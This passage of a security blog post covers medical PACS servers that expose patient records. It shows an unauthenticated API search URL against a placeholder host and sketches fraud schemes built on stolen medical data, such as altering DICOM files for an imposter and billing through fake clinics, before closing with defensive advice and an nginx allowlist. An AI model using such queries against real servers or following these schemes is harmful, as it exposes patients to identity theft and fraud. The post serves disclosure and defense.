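# http://pacs.example.com:8080/search?query=StudyDate%3A%5B20141101%20TO%2020141103%5D
```

Neither request carries a session token or credentials of any kind, which is the whole point: the authentication the front panel asked for is simply absent at the API layer.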

Black market data

“So what’s the big deal?” you might ask. “This data does not contain a credit card number, and sometimes not even a Social Security number.” But we have seen that on the black market, medical data is much more valuable to criminals than a credit card, or even a Social Security number alone. We have seen listings showing medical data selling for as much as 10 times what a credit card can fetch.

So why is this type of info so valuable to criminals? What harm can criminals do with a breach of this system?

For starters, a complete patient file will contain everything from the SSN to addresses, phone numbers, and all related data, making it a complete package for identity theft. These databases contain full patient data and can easily be turned around and sold on the black market. Selling to another criminal may bring less money, but it is easier money. Now, aside from basic ID theft and resale, let’s talk about some more targeted and interesting use cases.

The simplest case: vandalism and ransom. In this specific case, since the hacker has access to the portal, deleting this data or holding it for ransom is definitely a possibility.

The next potential crime is more interesting and could be a lot more lucrative for criminals. As I have described in this article, medical records are stored in silos, and it is not possible for one medical professional to cross check patient data with any kind of central database. So, two scenarios emerge.

Number one is modification of patient data for tax fraud. A criminal could take individual patient records, complete with CT scan images or X-rays, and, using freely available DICOM image editors and related software, modify legitimate patient files to contain imposter information. When the imposter takes a CD to a doctor as a new patient, the doctor will be none the wiser. It then becomes quite feasible for the imposter to claim Medicare benefits or tax refunds based on a disease they do not actually have.

Number two is even more extreme and lucrative. There have been documented cases where criminals create fake clinics and submit legitimate but stolen patient data to their own fake clinic on behalf of the compromised patients, unbeknownst to them. They can then receive medical payouts from insurance companies without actually having a patient to work on.


Takeaways

There are three major takeaways from this research. The first is for the clients of medical clinics. Given how much known and proven insecurity there is in the medical world, a patient concerned about identity theft may be wise to ask how their data will be stored at any medical facility they visit. If the facility cannot provide details on how your data is safely stored, you are probably better off asking for your data the old-fashioned way: on a CD. Although this may be inconvenient in some ways, at least it will keep your identity safe.

The second takeaway is for medical clinics and practices. If you are not prepared to invest the time and money in proper security, it is irresponsible to offer this type of storage. Either stick to the old-school patient data methods or spend the time making sure you keep your patients’ identities safe.

At the bare minimum, if you insist on rolling out your own service, keep it local to your organization and allow access only to pre-defined machines. A username and password is not enough of a security measure, let alone the default one. Alternatively, if you do not have the technical staff to properly implement PACS servers, it is best to pay for a reputable cloud-based service that has a good track record and documented security practices. You should not jump into the modern information world if you are not prepared to understand the constraints that go along with it.
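As one concrete shape of "allow access only to pre-defined machines," here is a minimal sketch of an IP allowlist in front of the web panel, assuming an nginx reverse proxy sits before Dicoogle. All addresses and names are placeholders for your own environment, and this complements, rather than replaces, keeping the service off the public Internet entirely.

```nginx
# Hypothetical nginx reverse proxy in front of Dicoogle's web panel:
# only pre-defined machines on the clinic's network may connect.
server {
    listen 443 ssl;
    server_name pacs.clinic.example;   # placeholder hostname

    location / {
        allow 10.0.20.0/24;   # imaging workstations (placeholder range)
        allow 10.0.30.5;      # radiologist's VPN address (placeholder)
        deny  all;            # everyone else, including the open Internet

        proxy_pass http://127.0.0.1:8080;  # Dicoogle bound to localhost only
    }
}
```

The key design choice is binding the application itself to localhost so the only path in is through the proxy that enforces the allowlist.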

And finally, the last takeaway is for the developers. There have been enough examples over the last five years to prove that users either do not know about or do not care enough about security. Part of the responsibility lies on you to create software that cannot be easily abused or put users in danger.

The post Medical industry struggles with PACS data leaks appeared first on Malwarebytes Labs.


